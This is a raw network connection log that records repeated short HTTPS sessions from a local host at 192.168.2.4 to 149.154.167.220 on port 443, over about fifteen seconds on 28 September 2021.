Sep 28, 2021 07:58:43.710586071 CEST	443	49881	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:43.710747004 CEST	49881	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:43.711306095 CEST	49881	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:43.711337090 CEST	443	49881	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:43.768383980 CEST	443	49881	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:43.771085978 CEST	49881	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:43.771131992 CEST	443	49881	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:43.771265984 CEST	49881	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:43.771275043 CEST	443	49881	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:43.972743034 CEST	443	49881	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:43.972826958 CEST	443	49881	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:43.972920895 CEST	49881	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:43.973918915 CEST	49881	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:43.975173950 CEST	49882	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:43.975218058 CEST	443	49882	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:43.975449085 CEST	49882	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:43.976135015 CEST	49882	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:43.976152897 CEST	443	49882	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:44.031847000 CEST	443	49882	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:44.036725044 CEST	49882	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:44.036761045 CEST	443	49882	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:44.036983013 CEST	49882	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:44.036993027 CEST	443	49882	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:44.146790981 CEST	443	49882	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:44.146886110 CEST	443	49882	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:44.147078991 CEST	49882	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:44.147918940 CEST	49882	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:44.149271011 CEST	49883	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:44.149319887 CEST	443	49883	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:44.149482012 CEST	49883	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:44.150055885 CEST	49883	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:44.150068998 CEST	443	49883	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:44.207950115 CEST	443	49883	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:44.212976933 CEST	49883	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:44.213012934 CEST	443	49883	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:44.213108063 CEST	49883	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:44.213120937 CEST	443	49883	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:44.352509022 CEST	443	49883	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:44.352607012 CEST	443	49883	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:44.352957964 CEST	49883	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:44.354038954 CEST	49883	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:44.356115103 CEST	49884	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:44.356168985 CEST	443	49884	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:44.356282949 CEST	49884	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:44.356831074 CEST	49884	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:44.356852055 CEST	443	49884	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:44.423082113 CEST	443	49884	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:44.428932905 CEST	49884	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:44.428980112 CEST	443	49884	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:44.429585934 CEST	49884	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:44.429605961 CEST	443	49884	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:44.530252934 CEST	443	49884	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:44.530338049 CEST	443	49884	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:44.531786919 CEST	49884	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:44.532295942 CEST	49884	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:44.534360886 CEST	49885	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:44.534420013 CEST	443	49885	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:44.535505056 CEST	49885	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:44.535547018 CEST	49885	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:44.535558939 CEST	443	49885	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:44.595597982 CEST	443	49885	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:44.600183010 CEST	49885	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:44.600239992 CEST	443	49885	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:44.600400925 CEST	49885	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:44.600419044 CEST	443	49885	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:44.684274912 CEST	443	49885	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:44.684365034 CEST	443	49885	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:44.684561014 CEST	49885	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:44.685817003 CEST	49885	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:44.687596083 CEST	49886	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:44.687649965 CEST	443	49886	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:44.687786102 CEST	49886	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:44.688365936 CEST	49886	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:44.688383102 CEST	443	49886	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:44.744136095 CEST	443	49886	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:44.748379946 CEST	49886	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:44.748426914 CEST	443	49886	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:44.748778105 CEST	49886	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:44.748790026 CEST	443	49886	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:44.873589039 CEST	443	49886	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:44.873684883 CEST	443	49886	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:44.873749018 CEST	49886	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:44.874732018 CEST	49886	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:44.876912117 CEST	49887	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:44.876952887 CEST	443	49887	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:44.877062082 CEST	49887	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:44.877716064 CEST	49887	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:44.877732038 CEST	443	49887	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:44.933553934 CEST	443	49887	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:44.937886953 CEST	49887	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:44.937932014 CEST	443	49887	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:44.938079119 CEST	49887	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:44.938090086 CEST	443	49887	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:45.038692951 CEST	443	49887	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:45.038781881 CEST	443	49887	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:45.038845062 CEST	49887	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:45.039885998 CEST	49887	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:45.041585922 CEST	49888	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:45.041656017 CEST	443	49888	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:45.041758060 CEST	49888	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:45.042593956 CEST	49888	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:45.042620897 CEST	443	49888	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:45.099046946 CEST	443	49888	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:45.102794886 CEST	49888	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:45.102828979 CEST	443	49888	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:45.102996111 CEST	49888	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:45.103008032 CEST	443	49888	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:53.185153961 CEST	443	49888	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:53.185229063 CEST	443	49888	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:53.185292006 CEST	49888	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:53.189270020 CEST	49888	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:53.194190025 CEST	49910	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:53.194247007 CEST	443	49910	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:53.194323063 CEST	49910	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:53.194914103 CEST	49910	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:53.194941044 CEST	443	49910	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:53.250726938 CEST	443	49910	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:53.299962997 CEST	49910	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:53.374676943 CEST	49910	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:53.374708891 CEST	443	49910	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:53.374825954 CEST	49910	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:53.374840021 CEST	443	49910	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:56.313852072 CEST	443	49910	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:56.313932896 CEST	443	49910	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:56.314032078 CEST	49910	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:56.315143108 CEST	49910	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:56.317234993 CEST	49913	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:56.317276001 CEST	443	49913	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:56.317414045 CEST	49913	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:56.318089962 CEST	49913	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:56.318103075 CEST	443	49913	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:56.373938084 CEST	443	49913	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:56.377413988 CEST	49913	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:56.377460957 CEST	443	49913	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:56.377604008 CEST	49913	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:56.377610922 CEST	443	49913	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:56.488801956 CEST	443	49913	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:56.488903046 CEST	443	49913	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:56.489023924 CEST	49913	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:56.490214109 CEST	49913	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:56.492223978 CEST	49914	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:56.492284060 CEST	443	49914	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:56.492404938 CEST	49914	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:56.492974043 CEST	49914	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:56.492994070 CEST	443	49914	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:56.550034046 CEST	443	49914	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:56.553901911 CEST	49914	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:56.553960085 CEST	443	49914	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:56.554071903 CEST	49914	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:56.554085016 CEST	443	49914	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:56.657438040 CEST	443	49914	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:56.657542944 CEST	443	49914	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:56.657694101 CEST	49914	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:56.659272909 CEST	49914	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:56.662251949 CEST	49915	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:56.662322998 CEST	443	49915	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:56.662446976 CEST	49915	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:56.663146019 CEST	49915	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:56.663178921 CEST	443	49915	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:56.720021009 CEST	443	49915	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:56.723803997 CEST	49915	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:56.723839998 CEST	443	49915	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:56.724034071 CEST	49915	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:56.724045992 CEST	443	49915	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:56.828737020 CEST	443	49915	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:56.828856945 CEST	443	49915	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:56.828942060 CEST	49915	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:56.829938889 CEST	49915	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:56.832134008 CEST	49916	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:56.832314014 CEST	443	49916	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:56.832426071 CEST	49916	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:56.833218098 CEST	49916	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:56.833250999 CEST	443	49916	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:56.889615059 CEST	443	49916	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:56.894576073 CEST	49916	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:56.894635916 CEST	443	49916	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:56.894779921 CEST	49916	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:56.894795895 CEST	443	49916	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:56.992583036 CEST	443	49916	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:56.992680073 CEST	443	49916	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:56.992779016 CEST	49916	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:56.994012117 CEST	49916	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:56.996684074 CEST	49917	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:56.996726036 CEST	443	49917	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:56.996862888 CEST	49917	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:56.997842073 CEST	49917	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:56.997864008 CEST	443	49917	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:57.054781914 CEST	443	49917	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:57.059000969 CEST	49917	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:57.059027910 CEST	443	49917	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:57.077239990 CEST	49917	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:57.077263117 CEST	443	49917	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:57.160561085 CEST	443	49917	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:57.160659075 CEST	443	49917	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:57.160716057 CEST	49917	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:57.235147953 CEST	49917	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:57.369106054 CEST	49918	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:57.369142056 CEST	443	49918	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:57.369230032 CEST	49918	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:57.379451036 CEST	49918	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:57.379475117 CEST	443	49918	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:57.436606884 CEST	443	49918	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:57.441307068 CEST	49918	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:57.441337109 CEST	443	49918	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:57.441519022 CEST	49918	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:57.441530943 CEST	443	49918	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:57.546653986 CEST	443	49918	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:57.546751976 CEST	443	49918	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:57.546808958 CEST	49918	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:57.547779083 CEST	49918	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:57.549585104 CEST	49919	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:57.549705029 CEST	443	49919	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:57.549851894 CEST	49919	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:57.550579071 CEST	49919	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:57.550600052 CEST	443	49919	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:57.609106064 CEST	443	49919	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:57.613475084 CEST	49919	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:57.613511086 CEST	443	49919	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:57.613601923 CEST	49919	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:57.613615990 CEST	443	49919	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:57.726592064 CEST	443	49919	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:57.729890108 CEST	443	49919	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:57.733513117 CEST	49919	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:57.733553886 CEST	49919	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:57.734927893 CEST	49920	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:57.734978914 CEST	443	49920	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:57.735137939 CEST	49920	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:57.735822916 CEST	49920	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:57.735836029 CEST	443	49920	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:57.793313026 CEST	443	49920	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:57.799243927 CEST	49920	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:57.799276114 CEST	443	49920	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:57.799427986 CEST	49920	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:57.799434900 CEST	443	49920	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:57.900053978 CEST	443	49920	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:57.900105953 CEST	443	49920	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:57.900250912 CEST	49920	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:57.901628971 CEST	49920	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:57.903439045 CEST	49921	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:57.903498888 CEST	443	49921	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:57.903970957 CEST	49921	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:57.904522896 CEST	49921	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:57.904545069 CEST	443	49921	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:57.960071087 CEST	443	49921	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:57.965388060 CEST	49921	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:57.965423107 CEST	443	49921	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:57.966084003 CEST	49921	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:57.966094971 CEST	443	49921	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:58.063676119 CEST	443	49921	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:58.063752890 CEST	443	49921	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:58.063924074 CEST	49921	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:58.064929008 CEST	49921	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:58.066729069 CEST	49922	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:58.066765070 CEST	443	49922	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:58.070061922 CEST	49922	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:58.070657015 CEST	49922	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:58.070668936 CEST	443	49922	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:58.128112078 CEST	443	49922	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:58.132451057 CEST	49922	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:58.132472038 CEST	443	49922	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:58.132791042 CEST	49922	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:58.132797956 CEST	443	49922	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:58.245582104 CEST	443	49922	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:58.245660067 CEST	443	49922	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:58.246952057 CEST	49922	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:58.248234034 CEST	49922	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:58.250045061 CEST	49923	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:58.250080109 CEST	443	49923	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:58.250180960 CEST	49923	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:58.250699997 CEST	49923	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:58.250715971 CEST	443	49923	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:58.306602955 CEST	443	49923	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:58.314148903 CEST	49923	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:58.314178944 CEST	443	49923	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:58.314342022 CEST	49923	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:58.314348936 CEST	443	49923	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:58.420061111 CEST	443	49923	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:58.420139074 CEST	443	49923	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:58.420301914 CEST	49923	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:58.421351910 CEST	49923	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:58.423207998 CEST	49924	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:58.423240900 CEST	443	49924	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:58.426438093 CEST	49924	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:58.426949024 CEST	49924	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:58.426964998 CEST	443	49924	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:58.482491016 CEST	443	49924	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:58.486320019 CEST	49924	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:58.486349106 CEST	443	49924	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:58.487971067 CEST	49924	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:58.487987041 CEST	443	49924	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:58.616228104 CEST	443	49924	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:58.616308928 CEST	443	49924	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:58.616558075 CEST	49924	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:58.617688894 CEST	49924	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:58.619575024 CEST	49925	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:58.619606972 CEST	443	49925	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:58.619935036 CEST	49925	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:58.620461941 CEST	49925	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:58.620480061 CEST	443	49925	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:58.676650047 CEST	443	49925	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:58.681822062 CEST	49925	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:58.681849003 CEST	443	49925	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:58.684427023 CEST	49925	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:58.684448957 CEST	443	49925	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:58.777724981 CEST	443	49925	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:58.777817965 CEST	443	49925	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:58.777885914 CEST	49925	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:58.778697014 CEST	49925	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:58.781055927 CEST	49926	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:58.781085968 CEST	443	49926	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:58.781156063 CEST	49926	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:58.781697989 CEST	49926	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:58.781707048 CEST	443	49926	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:58.837356091 CEST	443	49926	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:58.840210915 CEST	49926	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:58.840233088 CEST	443	49926	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:58.840342045 CEST	49926	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:58.840348959 CEST	443	49926	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:58.963718891 CEST	443	49926	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:58.963794947 CEST	443	49926	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:58.963897943 CEST	49926	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:58.964817047 CEST	49926	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:58.966559887 CEST	49927	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:58.966605902 CEST	443	49927	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:58.966718912 CEST	49927	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:58.967228889 CEST	49927	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:58.967253923 CEST	443	49927	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:59.023746014 CEST	443	49927	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:59.027482986 CEST	49927	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:59.027543068 CEST	443	49927	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:59.027749062 CEST	49927	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:59.027761936 CEST	443	49927	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:59.122307062 CEST	443	49927	149.154.167.220	192.168.2.4
